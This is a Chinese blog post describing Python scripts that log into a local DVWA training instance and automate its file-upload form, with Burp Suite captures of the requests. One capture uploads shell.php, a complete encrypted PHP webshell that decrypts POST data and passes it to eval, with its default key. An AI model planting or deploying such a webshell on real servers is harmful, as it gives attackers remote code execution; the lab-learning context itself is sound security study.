【Dvwa&Python】Dvwa文件上传python脚本(已实现)

最新推荐文章于 2023-11-26 14:06:45 发布
最新推荐文章于 2023-11-26 14:06:45 发布
阅读量693 收藏 1
点赞数
分类专栏: python Dvwa 文章标签: upload
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dive668/article/details/115617818
版权
python 同时被 2 个专栏收录
15 篇文章 0 订阅
订阅专栏
Dvwa
4 篇文章 0 订阅
订阅专栏

Dvwa文件上传python脚本

参考资料

python模拟文件上传(multipart/form-data形式)
从Python脚本使用POST发送文件

核心代码-写在前面

headers={'Host':'127.0.0.1',
			'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
			'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
			'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
			'Connection':'keep-alive',
			'Upgrade-Insecure-Requests':'1',
			'Cookie':a[0],
			'Referer':'http://localhost/DVWA/vulnerabilities/upload/'
			}
	files={
		'MAX_FILE_SIZE':(None,'100000'),
		'uploaded':('http_ninaimgcnjpeg.jpg',open('d:/http_ninaimgcnjpeg.jpg','rb'),'image/jpeg'),
		'Upload':(None,'Upload'),
		'user_token': (None,a[1])
	}
	print(files)
	url="http://localhost/DVWA/vulnerabilities/upload/"
	#res=requests.post(url,files=files,headers=headers)
	r=requests.post(url,files=files,headers=headers)
	print(r.text)

登录

import requests
import urllib
import re
import time
import threading
from bs4 import BeautifulSoup

def get_cookie_token(url_start):
	headers={'Host':'127.0.0.1',
			'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
			'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
			'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
			'Connection':'keep-alive',
			'Upgrade-Insecure-Requests':'1'}
	res=requests.get(url_start,headers=headers)
	cookies=res.cookies
	print(type(cookies))
	html=res.text
	soup=BeautifulSoup(html,"html.parser")
	s=soup.find('input',type='hidden').get('value')
	#token=soup.form.contents[3]['value']
	#token=soup.form.input.input.intput.input["value"]
	#token=soup.find_all('input')[3]['value']#找input列第四个
	print(cookies.items())
	#通过下面这行代码修改cookies里面提交的security等级
	cook=cookies.items()
	cook[1]=('security','low')
	a=[(';'.join(['='.join(item)for item in cook]))]
	print(a)
	a.append(s)
	#s=re.findall('<input type=\'hidden\'name=\'user_token\' value=\'(.*?)\'',html)
	return a;

def Sign_in(url_start):
	headers={
	'Referer':'http://localhost/DVWA/login.php',
	'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
	'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
	'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
	'Connection':'keep-alive',
	'Content-Length':'88',
	'Content-Type':'application/x-www-form-urlencoded',
	'Upgrade-Insecure-Requests':'1',
	'Cookie':a[0]}
	values={
		'username':'admin',
		'password':'password',
		'Login':'Login',
		'user_token':a[1]
	}
	datas=urllib.urlencode(values)
	response=requests.post(url_start,data=datas,headers=headers)

查看截获的数据包

下面是完整的burpsuite截断的请求数据包:

第一个是一个图片文件:

POST /DVWA/vulnerabilities/upload/ HTTP/1.1
Host: localhost
Content-Length: 45384
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycN6RcTS2dinYCv0J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/DVWA/vulnerabilities/upload/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: security=impossible; security=low; PHPSESSID=0qsc7bqrplkvoajud13qpemjk7
Connection: close

------WebKitFormBoundarycN6RcTS2dinYCv0J
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
------WebKitFormBoundarycN6RcTS2dinYCv0J
Content-Disposition: form-data; name="uploaded"; filename="芳.jpg"
Content-Type: image/jpeg

����

��/����r�6�心)�i/T:#��+{\���#QjA�b��]-j޻��JV��1�B�kH��BFw" ࡀ�z+���(��Ir��B���R�Q� �@�Hq# or����$�m������k������	;#q;��*������4��; ��ֽ��&��dF��

------WebKitFormBoundarycN6RcTS2dinYCv0J
Content-Disposition: form-data; name="Upload"

Upload
------WebKitFormBoundarycN6RcTS2dinYCv0J
Content-Disposition: form-data; name="user_token"

aff471e85b7e6106d8a7dcb44cb5c97f
------WebKitFormBoundarycN6RcTS2dinYCv0J--

对比性地上传一个木马文件:

POST /DVWA/vulnerabilities/upload/ HTTP/1.1
Host: localhost
Content-Length: 1154
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRDv1akW6LuJG9bD9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/DVWA/vulnerabilities/upload/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: security=impossible; security=low; PHPSESSID=0qsc7bqrplkvoajud13qpemjk7
Connection: close

------WebKitFormBoundaryRDv1akW6LuJG9bD9
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
------WebKitFormBoundaryRDv1akW6LuJG9bD9
Content-Disposition: form-data; name="uploaded"; filename="shell.php"
Content-Type: application/octet-stream

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

------WebKitFormBoundaryRDv1akW6LuJG9bD9
Content-Disposition: form-data; name="Upload"

Upload
------WebKitFormBoundaryRDv1akW6LuJG9bD9
Content-Disposition: form-data; name="user_token"

9e3a4c89f1560a8cf077c42a4cf974f8
------WebKitFormBoundaryRDv1akW6LuJG9bD9--

根据博客文章,模仿写一个脚本

文件打开位置存在错误,还没有正确运行,欢迎评论指正。
shell.php E:/securitytools/Behinder_v3.0_Beta_6_win/server/shell.php
上传没有提示错误,但实际上查看文件并没有上传成功。

import requests
import urllib
import re
import time
import threading
from bs4 import BeautifulSoup

def get_cookie_token(url_start):
	headers={'Host':'127.0.0.1',
			'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
			'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
			'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
			'Connection':'keep-alive',
			'Upgrade-Insecure-Requests':'1'}
	res=requests.get(url_start,headers=headers)
	cookies=res.cookies
	print(type(cookies))
	html=res.text
	soup=BeautifulSoup(html,"html.parser")
	s=soup.find('input',type='hidden').get('value')
	#token=soup.form.contents[3]['value']
	#token=soup.form.input.input.intput.input["value"]
	#token=soup.find_all('input')[3]['value']#找input列第四个
	print(cookies.items())
	#通过下面这行代码修改cookies里面提交的security等级
	cook=cookies.items()
	cook[1]=('security','low')
	a=[(';'.join(['='.join(item)for item in cook]))]
	print(a)
	a.append(s)
	#s=re.findall('<input type=\'hidden\'name=\'user_token\' value=\'(.*?)\'',html)
	return a;

def Sign_in(url_start):
	headers={
	'Referer':'http://localhost/DVWA/login.php',
	'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
	'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
	'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
	'Connection':'keep-alive',
	'Content-Length':'88',
	'Content-Type':'application/x-www-form-urlencoded',
	'Upgrade-Insecure-Requests':'1',
	'Cookie':a[0]}
	values={
		'username':'admin',
		'password':'password',
		'Login':'Login',
		'user_token':a[1]
	}
	datas=urllib.urlencode(values)
	response=requests.post(url_start,data=datas,headers=headers)
def file_upload():
	url="http://localhost/DVWA/login.php"
	a=get_cookie_token(url)
	Sign_in(url)
	files={
		'MAX_FILE_SIZE':(None,'100000'),
		'uploaded':('http_ninaimgcnjpeg.jpg',open('‪C:/Users/Lenovo/Pictures/Saved Pictures/http_ninaimgcnjpeg.jpg','rb'),'image/jpeg'),
		'Upload':(None,'Upload'),
		'user_token':(None,a[1])
	}
	headers={
		'Referer':'http://localhost/DVWA/vulnerabilities/upload/',
		'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
		'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
		'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
		'Connection':'keep-alive',
		'Content-Length':'88',
		'Content-Type':'application/x-www-form-urlencoded',
		'Upgrade-Insecure-Requests':'1',
		'Cookie':a[0]}
	url="http://localhost/DVWA/vulnerabilities/upload/"
	res=requests.post(url,files=files,headers=headers)
	print(res.text)
if __name__ == '__main__':
	url="http://localhost/DVWA/login.php"
	a=get_cookie_token(url)
	Sign_in(url)
	cookies=a[0]
	user_token=a[1]
	file_upload()

已实现

开心(^-^)
上述错误,有的是因为路径无法读取,所以将图片移植到一个不带空格的,没有汉字的,d盘根目录下。
IOError: [Errno 22] invalid mode (‘rb’) or filename: ’\u202a’ / '\xe2\x80\xaa’
关于python在Windows中直接复制文件路径字符串中有’\xe2\x80\xaa’,导致文件读取失败
修改了部分代码表述,因为无法访问到upload界面,重新找到了之前成功登陆的brute force的代码,移植了过来。
核心代码不变

files=
{
}
r=requests.post(url,files=files,headers=headers)

七龙珠的故事就这样结束了

import requests
import urllib
import re
import time
import threading
from bs4 import BeautifulSoup

def get_cookie_token(url_start):
	headers={'Host':'127.0.0.1',
			'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
			'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
			'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
			'Connection':'keep-alive',
			'Upgrade-Insecure-Requests':'1'}
	res=requests.get(url_start,headers=headers)
	cookies=res.cookies
	print(type(cookies))
	html=res.text
	soup=BeautifulSoup(html,"html.parser")
	s=soup.find('input',type='hidden').get('value')
	#token=soup.form.contents[3]['value']
	cook=cookies.items()
	cook[1]=('security','medium')
	a=[(';'.join(['='.join(item)for item in cook]))]
	a.append(s)
	#s=re.findall('<input type=\'hidden\'name=\'user_token\' value=\'(.*?)\'',html)
	return a;

def Sign_in(url_start):
	headers={
	'Referer':'http://localhost/DVWA/login.php',
	'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
	'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
	'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
	'Connection':'keep-alive',
	'Content-Length':'88',
	'Content-Type':'application/x-www-form-urlencoded',
	'Upgrade-Insecure-Requests':'1',
	'Cookie':a[0]}
	values={
		'username':'admin',
		'password':'password',
		'Login':'Login',
		'user_token':a[1]
	}
	datas=urllib.urlencode(values)
	response=requests.post(url_start,data=datas,headers=headers)

	
if __name__ == '__main__':
	url="http://localhost/DVWA/login.php"
	a=get_cookie_token(url)
	Sign_in(url)
	headers={'Host':'127.0.0.1',
			'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
			'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
			'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
			'Connection':'keep-alive',
			'Upgrade-Insecure-Requests':'1',
			'Cookie':a[0],
			'Referer':'http://localhost/DVWA/vulnerabilities/upload/'
			}
	files={
		'MAX_FILE_SIZE':(None,'100000'),
		'uploaded':('http_ninaimgcnjpeg.jpg',open('d:/http_ninaimgcnjpeg.jpg','rb'),'image/jpeg'),
		'Upload':(None,'Upload'),
		'user_token': (None,a[1])
	}
	print(files)
	url="http://localhost/DVWA/vulnerabilities/upload/"
	r=requests.post(url,files=files,headers=headers)
	print(r.text)
TIGER1693
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python脚本实现Web漏洞扫描工具
09-21
### Python脚本实现Web漏洞扫描工具 #### 一、项目背景与目的 本文介绍的是一个由作者在毕业设计阶段开发的Web漏洞扫描工具。该工具主要用于检测常见的Web应用安全漏洞,如SQL注入漏洞、SQL盲注漏洞以及跨站脚本...
基于Python/Socket实现小型的远程木马(包含实验)
BrosyveryOK的博客
10-05 2559
本文是用 Python 的 Socket 模块进行的服务搭建,主要是基于TCP服务的远程木马,因此要掌握一点TCP服务搭建的知识,可以参考我的另一篇文章,结合网上搜索的知识,搭建TCP服务器和客户端,然后再进行实验。用Python搭建非常简易的TCP客户端和服务器_br0sy的博客-CSDN博客还要用到 Python 的 os 模块,进行命令操作,接下去话不多说,直接开始写代码
如何用python写一个小木马
assion
03-02 1673
这个python木马更准确来说算不上是木马,只能是一个小工具,主要功能是来获取本地doc或者txt文档甚至是图片的,并把这些文档压缩直接通过FTP上传到服务器。这不禁让我想起了上学的时候,上选修课的时候,老师所讲的讲义是不会下发的,但是他的讲义全都是试题,对于一个经常翘课的我来说,上课认真听讲是不存在的。第一步、提取当前目录下png、jpg结尾的文件,注意很多图片格式还有可能是jpeg的。注意:FPT服务器的端口一定要开放,否则会出现上传失败的情况。我在想如何能“偷”到老师的试题,于是这个脚本孕育而生。
Python脚本模拟登陆DVWA
谢公子的博客
10-07 3382
目录 requests模拟登陆 Selenium自动化测试登陆 环境:python3.7 windows requests模拟登陆 我们登陆DVWA的时候,看似只有一步:访问网站,输入用户名和密码,登陆成功则跳转到新页面。 其实这中间分了三步。 1、访问网站的瞬间,浏览器会先向网站的登录页面发送GET请求,然后服务器会返回带有 token 和 cookies 的信息给浏览器 ...
靶机渗透FristiLeaks1.3 ☀️新手详细☀️
君莫hacker的博客
09-08 7772
靶机FristiLeaks1.3的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/fristileaks-13,133/ 作者 Ar0xA 发布日期 2015年12月14日 难度 中等 靶机基本介绍: 一个小型虚拟机是为一个叫做Fristileaks的荷兰非正式黑客聚会而设计的。意味着可以在几个小时内完成,
Python简单木马编写
Amire0x的小乐园
03-09 4547
Python木马编写 遇到的问题和解决办法 开始是netcat.py文件,这个文件是准备模仿一部分kali工具net cat编写的 遇到了一个问题,代码写完跑不出来,脚本带参数也没法调试,通过添加print逐一排错,发现是socket中的recv函数的阻塞问题 即有两种模式阻塞与非阻塞 阻塞模式下:当缓冲区内有数据时,立即返回所有的数据;当缓冲区内无数据时,阻塞直到缓冲区中有数据。 非阻塞模式:当缓冲区内有数据时,立即返回所有的数据;当缓冲区内无数据时,产生EAGAIN的错误并返回(在Python中会抛出一
dvwa爆破脚本pytho3版
09-04
核心在于获取token,python3中通过requests、re模块获取token,在结合生成的字典进行爆破,代码简单展示了获取token的主要过程
python之——使用python编写爆破脚本
12-21
dvwa高级爆破 需要用户名 密码 token cookie 每次通过账号密码访问之前,需要获取token """ import urllib2 from bs4 import BeautifulSoup def getToken(): """提取token""" url=...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
网安+安全工具安装+dvwa安装.pdf
11-22
Python作为一种脚本语言,在网络安全领域也有着广泛的应用,特别是在自动化测试和数据处理方面。根据参考链接[2],可以按照以下步骤进行配置: - **下载Python**:访问Python官方网站下载适合当前操作系统版本的...
python3病毒系列(2)"木马"
曾经来过,又悄悄离去……的博客
05-26 7163
没的废话,直接上代码! 被控制端: import os import socket os.popen('net stop mpssvc') s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) host = 'USER-20180705UV' port = 6666 s.bind((host,port)) s.listen(5) while...
使用python编写简单的文件上传exp
CC210231的博客
04-02 2112
最近开始学习使用python进行exp的编写,毕竟python的功底也不太好,期间遇到了许多问题,下面,就记录一下编写文件上传exp的过程,希望对需要的人有帮助! 首先,我使用的是pikachu靶场的的文件上传的第一个模块来练习 创建一个简单地一句话木马,将文件后缀改为jpg(由于这一关是前端白名单验证,我们能通过抓包修改文件后缀绕过;也可以直接用exp绕过,因为requests的请求不经过前端,也就是不进行客户端验证,直接在请求数据中用php后缀就行;但这里我们要分析数据包,得进行正常的上传流
DVWA 文件上传通关攻略
qq_45953122的博客
08-29 648
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。
python DVWA文件上传POC练习
weixin_56537388的博客
09-10 262
这里需要将内容变成这种格式的请求头,这里可以用笨方法一个一个改,但是这里是可以通过python的正则表达式来提高我们的效率的。这里先选择低难度的文件上传,低难度的是没有任何过滤可以直接上传的,先上传一个php一句话木马,使用burpsuite抓包。在头部信息里其实只要UA信息就可以了,cookie和accept可以要也可以不要,可以自己慢慢修改。首先,构造POC我们首先要明白漏洞利用的流程,然后要知道请求包的格式,然后才能针对性的POC。这里按照下面的步骤,如果要求不同选择其他正则表达式即可。
Python脚本--文件上传
最新发布
m0_62202418的博客
11-26 467
代码Python脚本--文件上传
Python脚本--Flask 文件上传功能(前后端分离)
⎛⎝世界⎠⎞的博客
07-15 1919
偶然在Java开发的同事那里看到的;UI界面比我原来写的好看,但由于是临时项目使用的,并没有做前后端分离。使用PythonFlask写了一个简单的后台脚本。前端页面如下目录结构--视频.mp4app.py。
DVWA-多个工具及python代码实现暴力破解登录
nex1less的博客
07-19 2262
前言现在那个DVWA里的Brute Force都已经烂大街了,那么今天我们就来演示一下如何从登录页面暴力破解进去 0x01.python代码: 1.在浏览器找到dvwa登录页面 2.我们尝试提交数据: 发现点击登录之后url上依然是login.php,并且出现login failed 提示 由此我们确定此页面的http请求方式为post 3.打开Burpsuite并...
DVWA文件上传漏洞
sunshine1_0的博客
01-20 1748
文件上传漏洞 低级别 中等级别 高级别
DVWA之PHP文件上传漏洞(File Upload
热门推荐
Mi1k7ea
01-22 1万+
文件上传漏洞是指由于服务器对于用户上传部分的控制不严格导致攻击者可以上传一个恶意的可执行的文件到服务器。简单点说,就是用户直接或者通过各种绕过方式将webshell上传到服务器中进而执行利用。 首先保存一句话木马为1.php文件: 另外对于上传的文件,可在DVWA的服务器中(本人用的是Metasploitable虚拟机)以下路径找到: /var/www/dvwa/hackab
python脚本爆破dvwa
09-23
Python脚本可以用于爆破DVWA(Damn Vulnerable Web ...在DVWA SQL注入的例子中,根据提供的引用,通过修改Python脚本中的SQL查询语句,可以针对不同的安全等级(Low、Medium、High、Impossible)进行SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值